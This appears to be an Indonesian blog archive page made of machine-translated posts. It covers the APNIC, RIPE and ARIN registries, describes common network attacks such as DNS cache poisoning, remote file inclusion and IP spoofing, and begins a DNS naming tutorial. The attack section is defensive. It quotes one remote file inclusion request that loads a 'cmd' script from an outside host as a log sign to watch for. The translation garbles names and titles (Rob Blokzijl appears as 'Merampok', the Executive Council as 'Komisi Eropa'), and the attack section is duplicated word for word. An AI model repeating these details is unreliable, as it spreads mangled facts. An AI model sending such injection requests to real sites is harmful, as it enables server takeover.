berakhir, maka mulai periode konsolidasi untuk APNIC - masa pertumbuhan berkelanjutan, pengembangan kebijakan, dan penciptaan dokumentasi dan sistem internal. Sejak itu, APNIC telah terus tumbuh dari awal yang sederhana ke anggota lebih dari 1.500 di 56 ekonomi di seluruh wilayah dan sekretariat dari sekitar 50 anggota staf yang terletak di kantor pusat di Brisbane, Australia. Kebijakan proses pembangunan Kebijakan-kebijakan APNIC dikembangkan oleh keanggotaan dan lebih luas komunitas internet. Media besar untuk pengembangan kebijakan adalah face-to-face Pertemuan Kebijakan Terbuka, yang diadakan dua kali setiap tahun, dan milis diskusi. Pengembangan kebijakan APNIC prosesnya adalah: * Buka o Siapa saja dapat mengusulkan kebijakan. o Setiap orang dapat membicarakan proposal kebijakan. * Transparan o APNIC dokumen publik semua diskusi kebijakan dan keputusan. * Bottom-up o drive komunitas pengembangan kebijakan. Dokumen APNIC semua diskusi kebijakan dan keputusan untuk memberikan transparansi lengkap dari proses pengembangan kebijakan. Tahap proses pengembangan kebijakan Ada tiga fase utama dari proses pengembangan kebijakan APNIC: 1. Sebelum pertemuan APNIC 2. Pada pertemuan APNIC 3. Setelah pertemuan APNIC 1. Sebelum rapat Anda harus memasukkan kebijakan atau perubahan yang diusulkan ke Sekretariat APNIC setidaknya empat minggu sebelum pertemuan di mana proposal akan dipertimbangkan. Ketua SIG Setelah menerima usulan, itu akan diposting ke milis sehingga masyarakat dapat membicarakannya. Hal ini memungkinkan orang untuk membahas proposal, dan ini merupakan cara penting bagi orang-orang yang tidak bisa menghadiri pertemuan telah mereka katakan. Semua diskusi ini diperhitungkan ketika usulan ini dibahas di APNIC Open Policy Meeting (OPM). 2. Pada pertemuan Pada OPM sendiri, kebijakan yang diusulkan disajikan selama sesi SIG yang sesuai. Ini adalah kesempatan untuk mempresentasikan proposal Anda secara pribadi, atau dengan cara lain jika Anda tidak dapat hadir. Masyarakat akan menggunakan kesempatan ini untuk mengomentari proposal. Jika proposal mencapai konsensus, yang SIG laporan Ketua keputusan pada APNIC Member Meeting (AMM) pada akhir minggu. Keanggotaan APNIC kemudian diminta untuk mendukung keputusan SIG. 3. Setelah pertemuan Dalam seminggu proposal yang disahkan pada Rapat Anggota APNIC (AMM), proposal dikirim kembali ke milis untuk delapan minggu periode komentar. Jika ada perubahan yang dilakukan pada proposal selama pertemuan APNIC, delapan minggu ini periode komentar masyarakat memberikan kesempatan untuk mengomentari proposal yang dimodifikasi. Jika proposal tersebut dianggap telah mencapai konsensus selama delapan komentar minggu periode itu, Ketua SIG APNIC akan meminta Dewan Eksekutif (EC) untuk mendukung usulan tersebut. Setelah APNIC kebijakan Komisi Eropa mendukung proposal, Sekretariat APNIC mengimplementasikan kebijakan. Ini biasanya terjadi minimal tiga bulan setelah dukungan Komisi Eropa.
Réseaux IP Européens (RIPE)
Réseaux IP Européens (RIPE, Perancis untuk "Eropa IP Networks") adalah suatu forum terbuka untuk semua pihak yang berkepentingan dengan pengembangan teknis Internet. RIPE masyarakat yang tujuannya adalah untuk memastikan bahwa koordinasi administratif dan teknis yang diperlukan untuk mempertahankan dan mengembangkan internet terus berlanjut. Ini bukan sebuah standarisasi organisasi seperti IETF dan tidak berurusan dengan nama domain seperti ICANN. RIPE bukan badan hukum dan tidak memiliki keanggotaan formal. Ini berarti bahwa siapa saja yang tertarik pada karya RIPE dapat berpartisipasi melalui milis, dan dengan menghadiri pertemuan.
RIPE memiliki ketua untuk mengawasi kerja antara RIPE Rapat dan menjadi penghubung eksternal. Merampok Blokzijl adalah juru bicara pada awal dan kemudian ketua. Masyarakat yang RIPE RIPE berinteraksi melalui Mailing Lists, RIPE RIPE Kelompok Kerja dan Rapat. Meskipun mirip nama, dan RIPE NCC RIPE adalah entitas yang terpisah. RIPE NCC yang memberikan dukungan administratif untuk RIPE, seperti Rapat RIPE fasilitasi dan memberikan dukungan administratif untuk RIPE Kelompok Kerja. Didirikan tahun 1992 oleh masyarakat RIPE untuk melayani sebagai badan administratif. Sejarah Pertemuan RIPE pertama diadakan pada tanggal 22 Mei 1989 di Amsterdam, Belanda. Itu membawa bersama-sama 14 wakil-wakil dari 6 negara dan 11 jaringan [1]. Pada waktu itu pemerintah Eropa, badan-badan standardisasi dan perusahaan telekomunikasi mendorong OSI-standar dan jaringan berbasis IP dilihat sebagai cara yang salah untuk pergi. Dalam komunitas akademik (terutama nuklir dan fisika partikel) ada kebutuhan yang kuat untuk bekerja sama dengan rekan-rekan di seluruh Eropa dan Amerika Serikat. IP menyediakan standar untuk memungkinkan interkoneksi dan kerjasama, sedangkan jaringan yang ditawarkan oleh perusahaan-perusahaan telekomunikasi Eropa sering sama sekali tidak memiliki itu. RIPE sebagai sebuah organisasi yang didirikan oleh RIPE kerangka acuan, yang telah disepakati pada 29 November 1989 [2]. Ada sepuluh organisasi yang bermaksud untuk berpartisipasi dalam Komite Koordinasi RIPE, di sepanjang garis didefinisikan oleh RIPE Terms of Reference, meskipun beberapa masih diperlukan membuat keputusan resmi. Organisasi-organisasi tersebut adalah: BelWue, CERN, EASInet, EUnet, GARR, HEPnet, NORDUnet, SURFnet, SWITCH dan XLink. [3]. Pada saat yang sama taskforces didirikan untuk memfasilitasi interkoneksi Eropa IP-jaringan dalam minggu-minggu berikutnya dan bulan-bulan [4] Keempat taskforces adalah: 1. Konektivitas dan Routing 2. Jaringan Manajemen dan Operasi 3. Domain Name System 4. Formal Koordinasi Salah satu hasil merupakan usulan pada 16 September 1990 untuk mendirikan Pusat Koordinasi Jaringan RIPE (NCC) untuk mendukung tugas-tugas administratif dalam masyarakat RIPE [5] dan yang pertama Rencana Kegiatan RIPE NCC diterbitkan Mei 1991 [6]. Tanya RIPE RARE (salah satu pendahulu dari TERENA) jika mereka akan memberikan kerangka hukum untuk RIPE NCC. Setelah prosedur permohonan, yang RIPE NCC dimulai pada April 1992 dengan kantor pusatnya di Amsterdam, Daniel Karrenberg sebagai manajer dan hanya dua anggota staf lain. Dana awal disediakan oleh jaringan akademis (RARE anggota), EARN dan EUnet. Yang RIPE NCC resmi didirikan ketika versi Belanda anggaran dasar diendapkan dengan Amsterdam Chamber of Commerce pada tanggal 12 November 1997 [7]. [Who?] Bagaimana nama ini terbentuk Tampaknya bahwa nama adalah hasil terjemahan dari judul Inggris diagram ke Bahasa Prancis oleh John Quarterman [8]. Ini disajikan dalam Sidang Istimewa RIPE 58 [9]. Apa yang dimaksud dengan RIPE Dokumen? Sebuah RIPE Dokumen adalah setiap dokumen, proposal, prosedur atau kebijakan yang telah diusulkan dan diterima oleh masyarakat RIPE. Semua Dokumen RIPE diterbitkan online di Dokumen RIPE Store. Kebijakan Pembangunan RIPE masyarakat yang mengembangkan dan menetapkan kebijakan untuk koordinasi teknis internet dan pengelolaan dan distribusi sumber daya Internet (IP Addresses dan Autonomous System (AS) Bilangan) melalui lama mapan, terbuka, bottom up dan proses diskusi berbasis konsensus pengambilan keputusan. Yang RIPE Proses Pengembangan Kebijakan trek resmi dan masukan ke dalam diskusi tentang kebijakan apa pun yang diusulkan. PDP yang RIPE transparan dan berbasis konsensus. Siapapun mungkin menyarankan kebijakan baru atau perubahan ke yang sudah ada. Proposal kemudian didiskusikan dan diterima atau ditolak oleh masyarakat RIPE RIPE sesuai dengan pedoman PDP. RIPE Rapat Rapat RIPE terjadi dua kali setahun. Biasanya, satu pertemuan yang diadakan di Amsterdam, Belanda, dan yang lain di suatu tempat di wilayah layanan RIPE NCC. Pertemuan lima hari acara di mana Internet Service Provider (ISP), operator jaringan, wakil pemerintah, regulator dan pihak-pihak lain yang tertarik berkumpul untuk membahas isu-isu yang relevan, perkembangan dan kebijakan. RIPE Rapat terbuka untuk siapa saja, walaupun pendaftaran diperlukan. Pertemuan selalu diakhiri dengan presentasi Secret Working Group. Presentasi terdiri dari limericks, dll haikus merujuk pada apa yang terjadi pada pertemuan atau di masyarakat. Apa yang dimaksud dengan RIPE Working Group? The RIPE masyarakat telah membentuk beberapa Kelompok Kerja RIPE untuk menangani berbagai isu dan topik yang terkait dengan pekerjaan dan RIPE NCC anggota komunitas internet umum. Masing-masing Kelompok Kerja RIPE memiliki sebuah mailing list di mana topik atau pertanyaan yang terkait dengan kelompok kerja dapat didiskusikan. Kelompok Kerja yang RIPE bertemu dua kali setahun dalam sesi khusus pada Rapat RIPE. RIPE Komunitas RIPE masyarakat yang mengacu secara kolektif kepada setiap individu atau organisasi, apakah anggota RIPE NCC atau tidak, yang memiliki minat dalam cara internet dikelola, terstruktur atau diatur
American Registry untuk Internet Numbers (ARIN)
American Registry untuk Internet Numbers (ARIN) adalah Regional Internet Registry (RIR) untuk Kanada, Karibia dan banyak pulau-pulau Atlantik Utara, dan Amerika Serikat. ARIN mengelola nomor Internet distribusi sumber daya, termasuk IPv4 dan IPv6 ruang dan nomor AS. ARIN membuka pintunya untuk bisnis pada tanggal 22 Desember 1997 [1] setelah memasukkan di 18 April 1997 [2]. ARIN adalah sebuah lembaga nirlaba di negara bagian Virginia, negara bagian AS.
Hal ini bermarkas di wilayah tak berhubungan Fairfax County, Virginia, Washington Dulles International Airport dan dekat Chantilly. [3] [4] [5] ARIN adalah salah satu dari lima Regional Internet Registry (RIR) di dunia. Seperti RIR lainnya, ARIN: * Memberikan layanan yang berkaitan dengan koordinasi teknis dan manajemen sumber daya nomor Internet * Memfasilitasi pengembangan kebijakan oleh para anggota dan stakeholder * Berpartisipasi dalam komunitas internet internasional * Apakah nirlaba, organisasi berbasis masyarakat * Apakah diperintah oleh dewan eksekutif dipilih oleh keanggotaannya Layanan ARIN menyediakan layanan yang berkaitan dengan koordinasi teknis dan manajemen sumber daya nomor Internet. Sifat layanan ini dijelaskan dalam pernyataan misi ARIN: Menerapkan prinsip-prinsip pelayanan, ARIN, sebuah lembaga nirlaba, mengalokasikan sumber daya Protokol Internet; mengembangkan kebijakan berbasis konsensus dan memfasilitasi kemajuan Internet melalui informasi dan pendidikan penjangkauan. Layanan ini dikelompokkan dalam tiga bidang: Pendaftaran, Organisasi, dan Kebijakan Pembangunan. Pendaftaran Layanan Pendaftaran Layanan berkaitan dengan koordinasi teknis dan pengelolaan inventarisasi sumber daya nomor Internet. Layanan meliputi: * Alokasi alamat IPv4 dan penugasan * Alamat IPv6 alokasi dan penugasan * Nomor AS penugasan * Direktori layanan termasuk: o Registrasi informasi transaksi (WHOIS) o Routing informasi (Internet Routing Registry) * DNS (Reverse) Untuk informasi tentang nomor internet meminta sumber daya dari ARIN, lihat https: / / www.arin.net / sumber daya / index.html. Bagian ini meliputi permintaan template, kebijakan distribusi khusus, dan panduan untuk meminta dan mengelola sumber daya nomor internet. Organisasi Pelayanan Layanan organisasi berkaitan dengan interaksi antara para stakeholder, ARIN anggota, dan ARIN. Layanan meliputi: * Pemilihan * Anggota rapat * Informasi publikasi dan penyebarluasan * Pendidikan dan pelatihan Kebijakan Pengembangan Jasa Jasa Pengembangan kebijakan memfasilitasi pengembangan kebijakan untuk koordinasi teknis dan manajemen sumber daya nomor Internet. Semua kebijakan ARIN diatur oleh masyarakat. Setiap orang didorong untuk berpartisipasi dalam proses pengembangan kebijakan di pertemuan kebijakan publik dan pada Kebijakan Publik Mailing List (ppml@arin.net). The ARIN Dewan Pengawas kebijakan meratifikasi hanya setelah: 1. diskusi di milis, dan pada saat rapat; 2. Dewan Pertimbangan ARIN rekomendasi; 3. konsensus masyarakat yang mendukung kebijakan dan 4. hukum penuh dan fiskal review. Masyarakat mengembangkan kebijakan dengan mengikuti Proses Pengembangan Kebijakan formal seperti diuraikan di https: / / www.arin.net / kebijakan / pdp.html. Kebijakan The Number Resource Manual, ARIN set lengkap kebijakan saat ini, tersedia di https: / / www.arin.net / kebijakan / nrpm.html. Keanggotaan tidak diperlukan untuk berpartisipasi dalam pengembangan kebijakan ARIN proses atau menerapkan sumber daya nomor Internet. Layanan meliputi: * Mempertahankan diskusi daftar e-mail * Melakukan pertemuan kebijakan publik * Penerbitan dokumen kebijakan Struktur Organisasi ARIN terdiri dari komunitas internet di dalam wilayah, para anggotanya, 7-anggota Dewan Pengawas, 15-anggota Dewan Penasehat, dan staf profesional di bawah 50. Dewan Pengawas dan Dewan Penasehat dipilih oleh anggota ARIN selama tiga tahun. Dewan Pengawas Keanggotaan yang ARIN memilih Dewan Pengawas (BOT), yang memiliki tanggung jawab utama untuk urusan bisnis dan keuangan ARIN kesehatan, dan mengelola operasi ARIN dengan cara yang sesuai dengan petunjuk yang diterima dari Dewan Pertimbangan dan tujuan yang ditetapkan oleh anggota registri . Bot bertanggung jawab untuk menentukan disposisi dari semua pendapatan yang diterima untuk memastikan semua layanan yang disediakan dalam cara yang adil. Bot meratifikasi proposal yang dihasilkan dari keanggotaan dan dikirimkan melalui Dewan Penasehat. Keputusan eksekutif dilaksanakan setelah disetujui oleh BOT. BOT terdiri dari 7 anggota: * Scott Bradner (Bendahara) * John Curran (Presiden dan CEO) * Timotius Denton * Lee Howard (Sekretaris) * Paul Vixie (Ketua) * Bill Woodcock * Vacant Position Dewan Penasehat Di samping BOT, ARIN memiliki Dewan Pertimbangan yang memberikan nasihat ARIN dan alokasi IP BOT pada kebijakan dan hal-hal terkait. Mengikuti prosedur di Internet Resource Proses Evaluasi Kebijakan, Dewan Penasehat depan kebijakan berbasis konsensus proposal kepada BOT untuk diratifikasi. Dewan Penasehat terdiri dari 15 anggota yang dipilih: * Dan Alexander * Paul Andersen * Cathy Aronson * Marla Azinger * Leo Bicknell * Marc Crandall * Bill Darte * Owen DeLong * David Farmer * Stacy Hughes * Scott Leibrand * Lea Roberts * Robert Seastrom * Heather Schiller * John buah apel manis (Ketua) Sejarah ARIN Logo dari tahun 1998 hingga 2001 Organisasi ini dibentuk pada Desember 1997 untuk "menyediakan layanan registrasi IP sebagai independen, lembaga nirlaba." Sampai saat ini IP pendaftaran di wilayah ARIN dilakukan oleh suatu departemen dalam perusahaan Network Solutions, yang menyediakan staf awal dan infrastruktur komputer untuk ARIN. Presiden pertama ARIN Kim Hubbard, dari tahun 1997 sampai tahun 2000. Kim digantikan oleh Raymond "Ray" Plzak sampai akhir 2008. Trustee John Curran adalah pejabat Presiden sampai 1 Juli tahun 2009 ketika ia mengambil peran CEO secara permanen. Ray Plzak tetap sebagai konsultan untuk organisasi. Sampai akhir tahun 2002 itu disajikan Meksiko, Amerika Tengah, Amerika Selatan dan seluruh Karibia. LACNIC sekarang menangani bagian dari Karibia, Meksiko, Amerika Tengah, dan Amerika Selatan. Juga, Sub-Sahara Afrika merupakan bagian dari wilayahnya sampai April 2005, ketika AfriNIC secara resmi diakui oleh ICANN sebagai kelima Regional Internet Registry. [sunting] Layanan Daerah Negara-negara di wilayah layanan ARIN adalah: * Anguilla * Antartika * Antigua dan Barbuda * Bahama * Barbados * Bermuda * Kepulauan Bouvet (Norwegia) * Kanada * Cayman Islands (Inggris) * Dominika * Grenada * Guadeloupe (Prancis) * Heard dan Kepulauan McDonald (Australia) * Jamaika * Martinique (Perancis) * Montserrat * Puerto Rico (US) * Saint Kitts dan Nevis * Saint Lucia * Saint Vincent dan Grenadines * St Helena (UK) * St Pierre dan Miquelon (Perancis) * Kepulauan Turks dan Caicos * Amerika Serikat * Kepulauan minor sekitar Amerika Serikat * British Virgin Islands (Inggris) * U. S. Virgin Islands (US) Mantan daerah layanan ARIN sebelumnya tertutup Angola, Botswana, Burundi, Republik Kongo, Republik Demokratik Kongo, Malawi, Mozambik, Namibia, Rwanda, Afrika Selatan, Swaziland, Tanzania, Zambia, dan Zimbabwe sampai AfriNIC terbentuk. ARIN sebelumnya tertutup Argentina, Aruba, Belize, Bolivia, Brazil, Chili, Kolombia, Kosta Rika, Kuba, Republik Dominika, Hindia Barat Belanda, Ekuador, El Salvador, Kepulauan Falkland (Inggris), Guyana Perancis, Guatemala, Guyana, Haiti, Honduras , Meksiko, Nikaragua, Panama, Paraguay, Peru, Georgia Selatan dan Kepulauan Sandwich Selatan, Suriname, Trinidad dan Tobago, Uruguay, dan Venezuela hingga LACNIC terbentuk.
Beberapa jenis serangan terhadap keamanan jaringan
Beberapa serangan umum Buffer overflow, diantaranya: a. Buffer overruns pada kebanyakan Web server Webserver Apache dan IIS memiliki celah keamanan. Worm seperti Code Red (untuk IIS) dan Linux. Slapper (untuk Apache) menjadikan celah keamanan yang lebar. b. DNS overflow Beberapa server DNS (BIND) sebelumnya tergolong rentan terhadap overflow. Suatu serangan yang akan memberikan nama DNS sangat panjang.
Nama DNS dibatasi hingga 64-byte per subkomponen dan 256 byte secara keseluruhan. c. Serangan DNS Server DNS biasanya dijalankan pada mode ‘Trust’ oleh service dan user – maksudnya bahwa server DNS dapat dikompromikan agar melancarkan serangan lebih jauh pada user dan service lainnya. Hal ini menjadikan server DNS merupakan target utama serangan para hacker. d. Mengelabui cache DNS Serangan yang umum terhadap server DNS. Sederhananya, bekerja dengan mengirimkan suatu pertanyaan untuk meminta domain yang sesungguhnya (“siapakah www.test.com ini?) dan akan disediakan jawaban yang tentu saja salah (“www.test.com adalah 127.0.01″). DNS Cache Poisoning DNS Cache Poisoning merupakan sebuah cara untuk menembus pertahanan dengan cara menyampaikan informasi IP Address yang salah mengenai sebuah host, dengan tujuan untuk mengalihkan lalu lintas paket data dari tujuan yang sebenarnya. Cara ini banyak dipakai untuk menyerang situs-situs e-commerce dan banking yang saat ini bisa dilakukan dengan cara online dengan pengamanan Token. Teknik ini dapat membuat sebuah server palsu tampil identik dengan dengan server online banking yang asli. Oleh karena itu diperlukan digital cerficate untuk mengamankannya, agar server palsu tidak dapat menangkap data otentifikasi dari nasabah yang mengaksesnya. Jadi dapat disimpulkan cara kerja DNS (Domain Name System) poisoning ini adalah dengan mengacaukan DNS Server asli agar pengguna Internet terkelabui untuk mengakses web site palsu yang dibuat benar-benar menyerupai aslinya tersebut, agar data dapat masuk ke server palsu. DNS Poisoning sendiri dahulu pertama kali ditunjukkan tahun 1997 oleh Eugene Kashpureff dengan cara mengalihkan request ke host InterNIC menuju ke situs pendaftaran domain name alternatif, AlterNIC. Request berhasil dialihkan dengan cara mengeksploitasi vulnerability pada DNS Service. Pada waktu Name Server menerima jawaban DNS Query, sumber jawaban ini membiarkan informasi yang tidak ditanyakan. Dengan begitu Kashpureff dapat memasukkan informasi DNS palsu pada jawaban yang sebenarnya tersebut. Name server yang menerima jawaban tersebut akan langsung menerima jawaban tersebut dan menyimpan informasi apapun yang didapatkannya dalam cache-nya. Hal ini mengakibatkan apabila user mencoba me-resolve suatu host dalam domain InterNIC, maka ia akan menerima informasi IP Address dari AlterNIC. Dengan kata lain ia sudah dialihkan ke alamat palsu. Remote File Inclusion (RFI) Remote file inclusion dapat diartikan sebagai penyisipan sebuah file dari luar suatu file dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load. Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini. Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi. File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya(Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root. Secara garis besar resiko serangan ini adalah: 1. Web root folder / subdirectory defacing. 2. Previledge escalation (mendapatkan hak akses lebih tinggi). 3. Menjalankan proses dalam server (psyBNC, bots, dsb) 4. Pilfering a.k.a pencurian data (such as credentials information, credit cards, dll..) 5. Dan banyak lagi…!!! Termasuk tindakan pengambilalihan server dan ddos. Hal yang bisa dilakukan untuk menghindari dari serangan ini adalah : Banyak sekali portal dan komunitas white hat yang sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yang berarti terhadap CMS yang mungkin sekarang anda gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET /index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga, karena bisa saja ini serangan terhadap web atau portal yang anda kelola. Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal. Gunakan firewall guna mencegah penyusupan orang-orang yang tidak bertanggung jawab dan memperhatikan port-port server yang sedang terbuka. IP SPOOFING IP spoofing adalah sejumlah serangan yang menggunakan perubahan sumber IP Address. Protokol TCP/IP tidak memiliki cara untuk memeriksa apakah sumber IP address dalam paket header benar-benar milik mesin yang mengirimkannya. Kemampuan ini sering dimanfaatkan oleh para hacker untuk melancarkan serangan seperti: a. SMURF Attack Suatu Broadcast ping yang terkirim dan sumber IP dari ping terlihat sama dengan IP address korban. Dalam kasus ini sejmlah besar komputer akan merespon balik dan mengirim suatu Ping reply ke korban. Kejadiannya terus berulang-kali, hingga mesin korban atau link mengalami overload dan dalam kondisi Denial of Service. b. Prediksi jumlah rangkaian TCP Suatu koneksi TCP yang ditandai dengan suatu jumlah rangkaian client dan server. Jika jumlah rangkaian tersebut dapat ditebak, para hacker dapat membuat packet dengan memalsukan IP address dan menebak urutan jumlah untuk melakukan hijack koneksi TCP. c. Prediksi rangkaian melalui pemalsuan DNS Server DNS biasanya mengquery server DNS lain untuk mengetahui nama host yang lain. Seorang hacker akan mengirimkan suatu request ke server DNS target seolah-olah seperti respon ke server yang sama. Dengan cara ini para hacker dapat membuat client yang mengakses, misalnya situs www.hotmail.com ke server milik sang hacker. Server DNS biasanya dijalankan pada mode ‘Trust’ oleh service dan user – maksudnya bahwa server DNS dapat dikompromikan agar melancarkan serangan lebih jauh pada user dan service lainnya. Hal ini menjadikan server DNS merupakan target utama serangan para hacker. d. Mengelabui cache DNS Serangan yang umum terhadap server DNS. Sederhananya, bekerja dengan mengirimkan suatu pertanyaan untuk meminta domain yang sesungguhnya (“siapakah www.test.com ini?) dan akan disediakan jawaban yang tentu saja salah (“www.test.com adalah 127.0.01″). DNS Cache Poisoning DNS Cache Poisoning merupakan sebuah cara untuk menembus pertahanan dengan cara menyampaikan informasi IP Address yang salah mengenai sebuah host, dengan tujuan untuk mengalihkan lalu lintas paket data dari tujuan yang sebenarnya. Cara ini banyak dipakai untuk menyerang situs-situs e-commerce dan banking yang saat ini bisa dilakukan dengan cara online dengan pengamanan Token. Teknik ini dapat membuat sebuah server palsu tampil identik dengan dengan server online banking yang asli. Oleh karena itu diperlukan digital cerficate untuk mengamankannya, agar server palsu tidak dapat menangkap data otentifikasi dari nasabah yang mengaksesnya. Jadi dapat disimpulkan cara kerja DNS (Domain Name System) poisoning ini adalah dengan mengacaukan DNS Server asli agar pengguna Internet terkelabui untuk mengakses web site palsu yang dibuat benar-benar menyerupai aslinya tersebut, agar data dapat masuk ke server palsu. DNS Poisoning sendiri dahulu pertama kali ditunjukkan tahun 1997 oleh Eugene Kashpureff dengan cara mengalihkan request ke host InterNIC menuju ke situs pendaftaran domain name alternatif, AlterNIC. Request berhasil dialihkan dengan cara mengeksploitasi vulnerability pada DNS Service. Pada waktu Name Server menerima jawaban DNS Query, sumber jawaban ini membiarkan informasi yang tidak ditanyakan. Dengan begitu Kashpureff dapat memasukkan informasi DNS palsu pada jawaban yang sebenarnya tersebut. Name server yang menerima jawaban tersebut akan langsung menerima jawaban tersebut dan menyimpan informasi apapun yang didapatkannya dalam cache-nya. Hal ini mengakibatkan apabila user mencoba me-resolve suatu host dalam domain InterNIC, maka ia akan menerima informasi IP Address dari AlterNIC. Dengan kata lain ia sudah dialihkan ke alamat palsu. Remote File Inclusion (RFI) Remote file inclusion dapat diartikan sebagai penyisipan sebuah file dari luar suatu file dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load. Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini. Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi. File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya(Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root. Secara garis besar resiko serangan ini adalah: 1. Web root folder / subdirectory defacing. 2. Previledge escalation (mendapatkan hak akses lebih tinggi). 3. Menjalankan proses dalam server (psyBNC, bots, dsb) 4. Pilfering a.k.a pencurian data (such as credentials information, credit cards, dll..) 5. Dan banyak lagi…!!! Termasuk tindakan pengambilalihan server dan ddos. Hal yang bisa dilakukan untuk menghindari dari serangan ini adalah : Banyak sekali portal dan komunitas white hat yang sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yang berarti terhadap CMS yang mungkin sekarang anda gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET /index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga, karena bisa saja ini serangan terhadap web atau portal yang anda kelola. Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal. Gunakan firewall guna mencegah penyusupan orang-orang yang tidak bertanggung jawab dan memperhatikan port-port server yang sedang terbuka. IP SPOOFING IP spoofing adalah sejumlah serangan yang menggunakan perubahan sumber IP Address. Protokol TCP/IP tidak memiliki cara untuk memeriksa apakah sumber IP address dalam paket header benar-benar milik mesin yang mengirimkannya. Kemampuan ini sering dimanfaatkan oleh para hacker untuk melancarkan serangan seperti: a. SMURF Attack Suatu Broadcast ping yang terkirim dan sumber IP dari ping terlihat sama dengan IP address korban. Dalam kasus ini sejmlah besar komputer akan merespon balik dan mengirim suatu Ping reply ke korban. Kejadiannya terus berulang-kali, hingga mesin korban atau link mengalami overload dan dalam kondisi Denial of Service. b. Prediksi jumlah rangkaian TCP Suatu koneksi TCP yang ditandai dengan suatu jumlah rangkaian client dan server. Jika jumlah rangkaian tersebut dapat ditebak, para hacker dapat membuat packet dengan memalsukan IP address dan menebak urutan jumlah untuk melakukan hijack koneksi TCP. c. Prediksi rangkaian melalui pemalsuan DNS Server DNS biasanya mengquery server DNS lain untuk mengetahui nama host yang lain. Seorang hacker akan mengirimkan suatu request ke server DNS target seolah-olah seperti respon ke server yang sama. Dengan cara ini para hacker dapat membuat client yang mengakses, misalnya situs www.hotmail.com ke server milik sang hacker.
Senin, 21 Februari 2011
PENAMAAN DNS ( Domain Name Service)
1.1 Domain Name Service (DNS)
Untuk mengidentifikasi suatu entitas, internet menggunakan alamat IP, yang secara unik mengidentifikasi koneksi dari host ke Internet. Namun, orang lebih suka menggunakan nama daripada alamat numerik. Oleh karena itu, kita membutuhkan sebuah sistem yang dapat memetakan nama ke alamat atau alamat untuk nama. Ketika Internet kecil, pemetaan dilakukan menggunakan file host. File tuan rumah hanya memiliki dua kolom: satu untuk nama dan satu untuk alamat. Setiap host dapat menyimpan file host pada disk dan memperbaruinya secara berkala dari file host master. Ketika sebuah program atau pengguna ingin untuk memetakan nama ke alamat, host berkonsultasi dengan file host dan menemukan pemetaan.
Hari ini, adalah mustahil untuk memiliki satu file host setiap berhubungan satu nama, dan sebaliknya. File tuan rumah akan terlalu besar untuk menyimpan di setiap host. Selain itu, tidak mungkin untuk memperbarui semua file host di dunia setiap kali ada perubahan. Salah satu solusi adalah dengan menyimpan file seluruh host dalam satu komputer dan memungkinkan akses ke informasi yang tersentralisasi untuk setiap komputer yang membutuhkan pemetaan, tetapi kita tahu bahwa ini akan menciptakan sejumlah besar lalu lintas di Internet. Solusi lain, yang digunakan saat ini salah satu, adalah untuk membagi ini sejumlah besar informasi menjadi bagian-bagian yang lebih kecil dan menyimpan setiap bagian pada komputer yang berbeda. Dalam metode ini, host yang perlu pemetaan dapat menghubungi komputer terdekat memegang informasi yang dibutuhkan. Metode ini digunakan oleh Domain Name System (DNS).
1.2 Nama Ruang
Nama ditugaskan untuk mesin harus hati-hati dipilih dari ruang nama dengan kontrol penuh atas pengikatan antara nama dan alamat IP. Nama harus unik karena alamat yang unik. Sebuah ruang nama yang memetakan setiap alamat ke nama yang unik dapat diatur dalam dua cara: datar atau hirarkis.
1.3 Nama Ruang Flat
Dalam ruang nama datar, nama ditugaskan untuk alamat. Sebuah nama dalam ruang ini adalah urutan karakter tanpa struktur. Nama mungkin atau mungkin tidak memiliki bagian umum, jika mereka melakukannya, itu tidak ada artinya. Kelemahan utama dari ruang nama datar adalah bahwa hal itu tidak dapat digunakan dalam suatu sistem besar seperti internet karena harus terpusat dikontrol untuk menghindari ambiguitas dan duplikasi.
1.4 Nama hirarkis Space
